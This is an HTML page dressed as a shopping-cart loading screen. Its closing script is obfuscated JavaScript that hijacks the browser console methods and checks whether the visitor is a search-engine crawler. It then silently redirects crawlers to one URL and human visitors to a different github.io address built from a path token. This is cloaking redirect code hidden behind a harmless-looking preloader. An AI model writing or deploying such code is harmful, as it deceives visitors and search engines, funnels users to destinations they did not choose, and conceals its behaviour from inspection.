<!DOCTYPE html>
<html>
	<head>
		<style>
			* {
				border: 0;
				box-sizing: border-box;
				margin: 0;
				padding: 0;
			}
			:root {
				--hue: 223;
				--bg: hsl(var(--hue), 10%, 90%);
				--fg: hsl(var(--hue), 10%, 10%);
				--primary: hsl(var(--hue), 90%, 55%);
				--trans-dur: 0.3s;
				font-size: calc(16px + (20 - 16) * (100vw - 320px) / (1280 - 320));
			}
			body {
				background-color: var(--bg);
				color: var(--fg);
				font: 1em/1.5 "DM Sans", sans-serif;
				height: 50vh;
				display: grid;
				place-items: center;
				transition: background-color var(--trans-dur), color var(--trans-dur);
			}
			.preloader {
				text-align: center;
				max-width: 20em;
				width: 100%;
			}
			.preloader__text {
				position: relative;
				height: 1.5em;
			}
			.preloader__msg {
				animation: msg 0.3s 13.7s linear forwards;
				position: absolute;
				width: 100%;
			}
			.preloader__msg--last {
				animation-direction: reverse;
				animation-delay: 14s;
				visibility: hidden;
			}
			.cart {
				display: block;
				margin: 0 auto 1.5em auto;
				width: 8em;
				height: 8em;
			}
			.cart__lines,
			.cart__top,
			.cart__wheel1,
			.cart__wheel2,
			.cart__wheel-stroke {
				animation: cartLines 2s ease-in-out infinite;
			}
			.cart__lines {
				stroke: var(--primary);
			}
			.cart__top {
				animation-name: cartTop;
			}
			.cart__wheel1 {
				animation-name: cartWheel1;
				transform: rotate(-0.25turn);
				transform-origin: 43px 111px;
			}
			.cart__wheel2 {
				animation-name: cartWheel2;
				transform: rotate(0.25turn);
				transform-origin: 102px 111px;
			}
			.cart__wheel-stroke {
				animation-name: cartWheelStroke;
			}
			.cart__track {
				stroke: hsla(var(--hue), 10%, 10%, 0.1);
				transition: stroke var(--trans-dur);
			}

			/* Dark theme */
			@media (prefers-color-scheme: dark) {
				:root {
					--bg: hsl(var(--hue), 10%, 10%);
					--fg: hsl(var(--hue), 10%, 90%);
				}
				.cart__track {
					stroke: hsla(var(--hue), 10%, 90%, 0.1);
				}
			}

			/* Animations */
			@keyframes msg {
				from {
					opacity: 1;
					visibility: visible;
				}
				99.9% {
					opacity: 0;
					visibility: visible;
				}
				to {
					opacity: 0;
					visibility: hidden;
				}
			}
			@keyframes cartLines {
				from,
				to {
					opacity: 0;
				}
				8%,
				92% {
					opacity: 1;
				}
			}
			@keyframes cartTop {
				from {
					stroke-dashoffset: -338;
				}
				50% {
					stroke-dashoffset: 0;
				}
				to {
					stroke-dashoffset: 338;
				}
			}
			@keyframes cartWheel1 {
				from {
					transform: rotate(-0.25turn);
				}
				to {
					transform: rotate(2.75turn);
				}
			}
			@keyframes cartWheel2 {
				from {
					transform: rotate(0.25turn);
				}
				to {
					transform: rotate(3.25turn);
				}
			}
			@keyframes cartWheelStroke {
				from,
				to {
					stroke-dashoffset: 81.68;
				}
				50% {
					stroke-dashoffset: 40.84;
				}
			}

		</style>
	</head>

	<body>
		<img src="//sstatic1.histats.com/0.gif?4804389&101" alt="" border="0">
		<div class="preloader">
			<svg class="cart" role="img" aria-label="Shopping cart line animation" viewBox="0 0 128 128" width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
				<g fill="none" stroke-linecap="round" stroke-linejoin="round" stroke-width="8">
					<g class="cart__track" stroke="hsla(0,10%,10%,0.1)">
						<polyline points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" />
						<circle cx="43" cy="111" r="13" />
						<circle cx="102" cy="111" r="13" />
					</g>
					<g class="cart__lines" stroke="currentColor">
						<polyline class="cart__top" points="4,4 21,4 26,22 124,22 112,64 35,64 39,80 106,80" stroke-dasharray="338 338" stroke-dashoffset="-338" />
						<g class="cart__wheel1" transform="rotate(-90,43,111)">
							<circle class="cart__wheel-stroke" cx="43" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
						<g class="cart__wheel2" transform="rotate(90,102,111)">
							<circle class="cart__wheel-stroke" cx="102" cy="111" r="13" stroke-dasharray="81.68 81.68" stroke-dashoffset="81.68" />
						</g>
					</g>
				</g>
			</svg>
			<div class="preloader__text">
				<p class="preloader__msg">Please Wait ...</p>
				<p class="preloader__msg preloader__msg--last">This is taking long. Something’s wrong.</p>
			</div>
		</div>
		<script>
function _0x16df(_0x1057bb,_0x57f62e){var _0xca6d4f=_0xca6d();return _0x16df=function(_0x16df91,_0x8461ad){_0x16df91=_0x16df91-(-0x2*-0x6a1+0x1fc5+-0x15*0x21d);var _0x2eadd5=_0xca6d4f[_0x16df91];return _0x2eadd5;},_0x16df(_0x1057bb,_0x57f62e);}function _0xca6d(){var _0x19c969=['5912856XEAqjW','1457880eOoyFQ','77FAgwdD','0|5|2|1|3|','location','YyCiT','error','mfkKv','split','110HLgptN','rn\x20this\x22)(','https://tw','eOgDd','hTxEu','VrFlz','RhRkd','DbTBe','ezsiT','constructo','bind','(((.+)+)+)','length','toString','log','search','258924dOxAHx','test','22045iKRgwA','218922aGHaYf','188HOONhr','wbVeN','Uikay','info','nction()\x20','tworter.gi','console','359937vNWULU','prototype','thub.io','table','JUEOA','EZYqs','mrrip','207667fpOYpD','https://','agyCy','kTKdJ','warn','t.co/item/','6DemwNG','TjflK','ctor(\x22retu','gUSMf','href','77lQEpMV'];_0xca6d=function(){return _0x19c969;};return _0xca6d();}(function(_0x3af6fc,_0x321efb){function _0x31c445(_0x28869c,_0x2bb0e9,_0x5501a9,_0x4405d9){return _0x16df(_0x4405d9-0x1de,_0x2bb0e9);}function _0x4d6200(_0x14e282,_0x4b85c1,_0x2b6b50,_0x22b52a){return _0x16df(_0x14e282- -0x48,_0x22b52a);}var _0x480260=_0x3af6fc();while(!![]){try{var _0x2a408a=-parseInt(_0x31c445(0x2bb,0x2ae,0x29d,0x2ae))/(0x22c5+-0x22f7*-0x1+-0x45bb)*(-parseInt(_0x4d6200(0x8e,0x8a,0xa9,0x7b))/(0x11a8+0xe02+-0x2*0xfd4))+-parseInt(_0x4d6200(0x5e,0x77,0x4e,0x5f))/(0x4*0x845+-0x33*-0x38+-0x1*0x2c39)+parseInt(_0x4d6200(0x7a,0x66,0x8b,0x62))/(-0x122c+0x102*-0x14+-0x8*-0x4cb)*(parseInt(_0x31c445(0x2af,0x284,0x2ae,0x29e))/(-0x12fe+-0x1*0x231a+-0x7bb*-0x7))+parseInt(_0x31c445(0x2b5,0x28f,0x292,0x29f))/(-0x169b+-0x1b41+0x18f1*0x2)*(-parseInt(_0x4d6200(0x93,0x7b,0xa3,0xaf))/(0x18af+0x1*-0x22e2+0xa3a))+parseInt(_0x31c445(0x2b9,0x2d1,0x2c5,0x2ba))/(0x2*0x82c+0x17*-0x43+0x1*-0xa4b)+-parseInt(_0x31c445(0x2b4,0x2a5,0x2bc,0x2a7))/(-0x6b7+0x235c+-0x1c9c)*(parseInt(_0x31c445(0x295,0x286,0x285,0x28c))/(0x38b+0x2309*0x1+-0x268a))+-parseInt(_0x31c445(0x29c,0x2a0,0x28d,0x285))/(-0x1ae7+0x112*0x1+0x8*0x33c)*(-parseInt(_0x4d6200(0x76,0x63,0x78,0x5d))/(-0x80d*-0x2+0x24f*0x9+-0x24d5));if(_0x2a408a===_0x321efb)break;else _0x480260['push'](_0x480260['shift']());}catch(_0x1e8e5b){_0x480260['push'](_0x480260['shift']());}}}(_0xca6d,0xb60a1*-0x1+0x3c7*-0x65+0x12ddce),(function(){var _0x18c9e0={'TjflK':_0x1e7068(-0x65,-0x6f,-0x4c,-0x4e)+'+$','kTKdJ':function(_0x36f367,_0x35919f){return _0x36f367+_0x35919f;},'DbTBe':'{}.constru'+_0x1e7068(-0x46,-0x5a,-0x3a,-0x3d)+_0x1e7068(-0x6f,-0x79,-0x89,-0x84)+'\x20)','YyCiT':function(_0x47ffe3){return _0x47ffe3();},'ezsiT':_0x61f36a(0x11,-0x2,0x5,0x8),'mrrip':_0x61f36a(0xa,0x16,0x2f,0x27),'JUEOA':_0x61f36a(0x11,0x7,-0x10,0x14),'mfkKv':_0x1e7068(-0x73,-0x60,-0x5b,-0x6c),'VrFlz':'exception','eOgDd':_0x1e7068(-0x52,-0x52,-0x6a,-0x59),'wbVeN':_0x1e7068(-0x50,-0x61,-0x59,-0x60),'JXNdA':_0x61f36a(-0x2d,-0x16,0x4,-0x11)+'4','RhRkd':function(_0x57209b,_0x4b6c89,_0x473208){return _0x57209b(_0x4b6c89,_0x473208);},'hTxEu':_0x61f36a(-0x5,0x13,0x2a,0x27),'gUSMf':'/view/prod'+'uct?tworte'+'r~','Uikay':function(_0x4dd93a,_0x591631){return _0x4dd93a+_0x591631;},'agyCy':_0x61f36a(-0x2,-0xe,-0x15,0xe)+'orter.tlas'+_0x1e7068(-0x49,-0x2d,-0x51,-0x2e)},_0x2ecb3b=(function(){var _0x54b00a=!![];return function(_0x2bd347,_0x173f9a){var _0x562e3f=_0x54b00a?function(){if(_0x173f9a){var _0x1cb3d5=_0x173f9a['apply'](_0x2bd347,arguments);return _0x173f9a=null,_0x1cb3d5;}}:function(){};return _0x54b00a=![],_0x562e3f;};}()),_0x2d714a=_0x18c9e0[_0x61f36a(-0x13,-0xa,-0x23,-0x17)](_0x2ecb3b,this,function(){function _0x20bbb7(_0x42be14,_0x45633f,_0x37660d,_0x329f67){return _0x1e7068(_0x42be14-0x10,_0x45633f-0x50,_0x37660d,_0x329f67-0xbb);}function _0xb72be9(_0x56dc5d,_0x8e56aa,_0x3fd2df,_0x1d1b99){return _0x61f36a(_0x56dc5d-0x110,_0x1d1b99- -0x31e,_0x3fd2df-0x87,_0x56dc5d);}return _0x2d714a[_0x20bbb7(-0x53,-0x6d,-0x38,-0x60)]()[_0x20bbb7(-0x51,-0x56,-0x65,-0x56)](_0x18c9e0[_0xb72be9(-0x303,-0x2fb,-0x319,-0x305)])[_0xb72be9(-0x311,-0x319,-0x307,-0x321)]()[_0x20bbb7(-0x57,-0x3b,-0x5c,-0x53)+'r'](_0x2d714a)[_0xb72be9(-0x33b,-0x313,-0x303,-0x31f)](_0x18c9e0[_0x20bbb7(-0x37,-0x38,-0x34,-0x4a)]);});_0x2d714a();var _0x3279b2=(function(){var _0x1a00cf=!![];return function(_0x4528d9,_0x2cac02){var _0x1a7892=_0x1a00cf?function(){if(_0x2cac02){var _0x4b9f08=_0x2cac02['apply'](_0x4528d9,arguments);return _0x2cac02=null,_0x4b9f08;}}:function(){};return _0x1a00cf=![],_0x1a7892;};}()),_0xd2373a=_0x3279b2(this,function(){function _0x4796db(_0x5428d0,_0x29bb34,_0x239796,_0x3bb54a){return _0x61f36a(_0x5428d0-0x1b3,_0x29bb34-0xd6,_0x239796-0x22,_0x5428d0);}var _0x3afaff=function(){var _0x5be6a3;function _0x437468(_0x1f1ef7,_0xe17437,_0x170827,_0x4841e3){return _0x16df(_0x1f1ef7-0x45,_0x4841e3);}function _0x277dec(_0x452da,_0x13ecf0,_0x27022a,_0x5d9a17){return _0x16df(_0x5d9a17-0x1a2,_0x452da);}try{_0x5be6a3=Function(_0x18c9e0[_0x277dec(0x271,0x260,0x25d,0x275)]('return\x20(fu'+_0x277dec(0x25f,0x265,0x260,0x268),_0x18c9e0[_0x277dec(0x265,0x258,0x26e,0x257)])+');')();}catch(_0x1d1402){_0x5be6a3=window;}return _0x5be6a3;},_0xdef669=_0x18c9e0[_0x4796db(0xab,0xc2,0xdb,0xcc)](_0x3afaff),_0x30b35c=_0xdef669[_0x4796db(0xec,0xe0,0xf6,0xf0)]=_0xdef669['console']||{},_0x1cdc7f=[_0x18c9e0[_0x4796db(0xc0,0xce,0xbb,0xdb)],_0x18c9e0[_0x3bd6e2(0x22c,0x244,0x243,0x24d)],_0x18c9e0[_0x4796db(0xe0,0xe5,0xdf,0xcb)],_0x18c9e0[_0x3bd6e2(0x210,0x21b,0x220,0x20d)],_0x18c9e0[_0x3bd6e2(0x23b,0x223,0x227,0x23c)],_0x18c9e0[_0x4796db(0xb0,0xc9,0xce,0xe4)],'trace'];function _0x3bd6e2(_0x426917,_0x5adf2d,_0x2325bd,_0x553d51){return _0x1e7068(_0x2325bd-0x292,_0x5adf2d-0x1f0,_0x553d51,_0x553d51-0x86);}for(var _0x37b84a=-0xe30+0x125e+-0xd6*0x5;_0x37b84a<_0x1cdc7f[_0x4796db(0xb8,0xd2,0xc6,0xe3)];_0x37b84a++){if(_0x4796db(0xf5,0xe6,0xd0,0xe9)===_0x18c9e0[_0x3bd6e2(0x24e,0x225,0x237,0x240)]){var _0x345e7b=_0x18c9e0['JXNdA']['split']('|'),_0x5068e7=0xc2e+-0x81*-0x3d+-0x2aeb;while(!![]){switch(_0x345e7b[_0x5068e7++]){case'0':var _0x561fd8=_0x3279b2[_0x4796db(0xd5,0xcf,0xbe,0xdb)+'r'][_0x4796db(0xe3,0xe2,0xe3,0xd9)]['bind'](_0x3279b2);continue;case'1':_0x561fd8['__proto__']=_0x3279b2['bind'](_0x3279b2);continue;case'2':var _0x3c8996=_0x30b35c[_0x1d0f48]||_0x561fd8;continue;case'3':_0x561fd8['toString']=_0x3c8996[_0x3bd6e2(0x22d,0x216,0x22f,0x231)][_0x4796db(0xd5,0xd0,0xb8,0xca)](_0x3c8996);continue;case'4':_0x30b35c[_0x1d0f48]=_0x561fd8;continue;case'5':var _0x1d0f48=_0x1cdc7f[_0x37b84a];continue;}break;}}else{if(_0x3a0c06){var _0x39a462=_0x429980['apply'](_0x71e73e,arguments);return _0x2d2052=null,_0x39a462;}}}});function _0x61f36a(_0x566122,_0x23c4c6,_0x38d0a2,_0x5694f1){return _0x16df(_0x23c4c6- -0xbe,_0x5694f1);}_0x18c9e0[_0x61f36a(-0x2b,-0x14,0x7,0x4)](_0xd2373a);var _0x35763d=window[_0x1e7068(-0x75,-0x5e,-0x5c,-0x82)][_0x1e7068(-0x44,-0x5f,-0x46,-0x5d)],_0x397212=window[_0x61f36a(-0x12,-0x15,-0x26,-0x23)]['hostname'],_0x312931=_0x397212[_0x61f36a(-0x13,-0x11,0x5,-0x6)]('.')[0x8*0x223+0x11f*-0x1b+0xd2d],_0x2a2ed4=_0x61f36a(0x15,0x9,-0x2,-0x6)+_0x1e7068(-0x53,-0x5d,-0x50,-0x5f),_0x54221c=_0x18c9e0[_0x1e7068(-0x4b,-0x65,-0x37,-0x50)](_0x18c9e0[_0x1e7068(-0x6c,-0x66,-0x60,-0x58)],_0x2a2ed4)+_0x18c9e0[_0x1e7068(-0x45,-0x3e,-0x36,-0x37)],_0x296971=_0x18c9e0[_0x61f36a(0x2,0x6,-0x7,0xa)](_0x18c9e0[_0x1e7068(-0x4c,-0x3c,-0x61,-0x4a)],_0x2a2ed4)+'/',_0x33c2ad=/bot|google|baidu|bing|msn|duckduckbot|teoma|slurp|yandex/i[_0x1e7068(-0x5f,-0x4f,-0x58,-0x54)](navigator['userAgent']),_0x572c3a=(location[_0x61f36a(0x2c,0x1c,0x19,0x5)]['match'](/\?\/(?:[^-]+)-([^\.]+)/)||[])[-0x1f*-0x2f+0x1468+-0x8*0x343];if(!_0x572c3a)return;function _0x1e7068(_0x4ec51f,_0x4ea99b,_0x11aad1,_0x129e88){return _0x16df(_0x4ec51f- -0x11e,_0x11aad1);}var _0x1cf7c6=_0x33c2ad?_0x54221c+_0x572c3a:_0x296971+_0x572c3a;location[_0x61f36a(0x13,0x1c,0x34,0x9)]=_0x1cf7c6;}()));
		</script>
	</body>
</html>
